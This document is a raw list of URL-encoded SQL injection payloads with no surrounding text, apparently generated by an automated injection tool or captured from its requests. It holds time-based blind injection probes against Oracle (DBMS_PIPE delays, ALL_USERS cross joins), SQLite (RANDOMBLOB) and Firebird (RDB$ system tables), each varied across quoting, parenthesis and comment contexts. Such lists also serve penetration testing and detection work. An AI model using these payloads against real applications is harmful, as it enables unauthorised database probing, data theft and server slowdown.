-2160%27%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%27FivP%27%20LIKE%20%27FivP -9470%22%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%22YeRZ%22%3D%22YeRZ -9088%22%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%22ruQx%22%3D%22ruQx -6296%22%29%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%28%22CLvl%22%3D%22CLvl -3809%22%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%22nZqS%22%3D%22nZqS -5465%22%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%22rVjM%22%20LIKE%20%22rVjM -4447%22%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%22GucC%22%20LIKE%20%22GucC -7844%22%29%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%28%22fRhf%22%20LIKE%20%22fRhf -7012%22%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%22bsVM%22%20LIKE%20%22bsVM -7179%25%27%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%27%25%27%3D%27 -4960%25%27%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%27%25%27%3D%27 -4147%25%27%29%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%28%27%25%27%3D%27 -4385%25%27%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%27%25%27%3D%27 -9534%00%27%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%27TaGr%27%3D%27TaGr -3638%00%27%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%27yLQl%27%3D%27yLQl -9261%27%29%20WHERE%209181%3D9181%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20--%20 -9438%22%29%20WHERE%205083%3D5083%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20--%20 -1071%27%20WHERE%206753%3D6753%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20--%20 -7880%22%20WHERE%205763%3D5763%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20--%20 -5111%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -8311%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%282313%3D2313 -3288%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%282568%3D2568 -4380%29%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%281139%3D1139 -1579%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -9379%29%20WHERE%207793%3D7793%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -2998%20WHERE%206189%3D6189%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -3148%27%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -9847%27%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -5553%22%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 -4485%27%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27weAn%27%3D%27weAn -1857%27%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27DmvP%27%3D%27DmvP -8341%27%29%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27gCMD%27%3D%27gCMD -7053%27%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27GNDr%27%3D%27GNDr -2147%27%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27iIVE%27%20LIKE%20%27iIVE -9899%27%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27WSmG%27%20LIKE%20%27WSmG -8634%27%29%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27uRYF%27%20LIKE%20%27uRYF -6693%27%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27GWUX%27%20LIKE%20%27GWUX -5861%22%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22ssQH%22%3D%22ssQH -5633%22%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22fPig%22%3D%22fPig -4819%22%29%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22LJTV%22%3D%22LJTV -2482%22%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22VKcL%22%3D%22VKcL -8178%22%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22Ugtk%22%20LIKE%20%22Ugtk -6294%22%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22Thjz%22%20LIKE%20%22Thjz -2429%22%29%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22StMY%22%20LIKE%20%22StMY -6194%22%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22bgbk%22%20LIKE%20%22bgbk -5052%25%27%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27%25%27%3D%27 -6328%25%27%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27%25%27%3D%27 -6663%25%27%29%29%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27%25%27%3D%27 -1249%25%27%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27%25%27%3D%27 -5978%00%27%29%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27UFLD%27%3D%27UFLD -3747%00%27%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27uZVW%27%3D%27uZVW -1354%27%29%20WHERE%202942%3D2942%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -8682%22%29%20WHERE%203803%3D3803%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -2738%27%20WHERE%209930%3D9930%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -7361%22%20WHERE%206008%3D6008%20OR%206540%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -8995%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -4695%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%282284%3D2284 -3166%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%281530%3D1530 -2342%29%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%284319%3D4319 -9703%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -1203%29%20WHERE%202424%3D2424%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -3502%20WHERE%209251%3D9251%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -1038%27%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -7872%27%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -8278%22%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -5082%27%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27ggZD%27%3D%27ggZD -2004%27%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27NuiK%27%3D%27NuiK -1402%27%29%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27xyDs%27%3D%27xyDs -5292%27%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27jaUj%27%3D%27jaUj -1118%27%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27FjeX%27%20LIKE%20%27FjeX -5204%27%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27TrnD%27%20LIKE%20%27TrnD -9801%27%29%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27zvEQ%27%20LIKE%20%27zvEQ -1112%27%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27ayqS%27%20LIKE%20%27ayqS -5817%22%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22EvRq%22%3D%22EvRq -8594%22%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22NfDk%22%3D%22NfDk -6221%22%29%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22ACHl%22%3D%22ACHl -6943%22%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22Omxu%22%3D%22Omxu -7657%22%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22fbCI%22%20LIKE%20%22fbCI -3427%22%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22NFZS%22%20LIKE%20%22NFZS -7332%22%29%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22YuLL%22%20LIKE%20%22YuLL -6455%22%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22GfDY%22%20LIKE%20%22GfDY -4613%25%27%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27%25%27%3D%27 -5742%25%27%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27%25%27%3D%27 -8547%25%27%29%29%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -1776%25%27%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27%25%27%3D%27 -8091%00%27%29%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27mIuH%27%3D%27mIuH -6337%00%27%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27hZWw%27%3D%27hZWw -7678%27%29%20WHERE%209669%3D9669%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -9324%22%29%20WHERE%207378%3D7378%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -3710%27%20WHERE%204223%3D4223%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -5632%22%20WHERE%203094%3D3094%20OR%201054%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -5142%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -8206%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%288994%3D8994 -4358%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%281068%3D1068 -1774%29%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%282889%3D2889 -6275%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -7758%29%20WHERE%209635%3D9635%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -6980%20WHERE%206096%3D6096%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -7614%27%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -3341%27%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -1746%22%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -5632%27%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27Zjew%27%3D%27Zjew -1255%27%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27MLjl%27%3D%27MLjl -2986%27%29%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27QlaY%27%3D%27QlaY -9644%27%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27XpEd%27%3D%27XpEd -9391%27%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27fJgO%27%20LIKE%20%27fJgO -1304%27%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27ZJnW%27%20LIKE%20%27ZJnW -3536%27%29%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27iwky%27%20LIKE%20%27iwky -3983%27%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27gZSE%27%20LIKE%20%27gZSE -8332%22%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22OnQL%22%3D%22OnQL -8241%22%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22JrOi%22%3D%22JrOi -7361%22%29%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22OcsO%22%3D%22OcsO -6735%22%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22vmef%22%3D%22vmef -6684%22%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22UqmC%22%20LIKE%20%22UqmC -9030%22%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22LcdL%22%20LIKE%20%22LcdL -9474%22%29%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22NNFU%22%20LIKE%20%22NNFU -3925%22%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22MTGh%22%20LIKE%20%22MTGh -7454%25%27%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27%25%27%3D%27 -8110%25%27%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27%25%27%3D%27 -2947%25%27%29%29%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27%25%27%3D%27 -3752%25%27%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27%25%27%3D%27 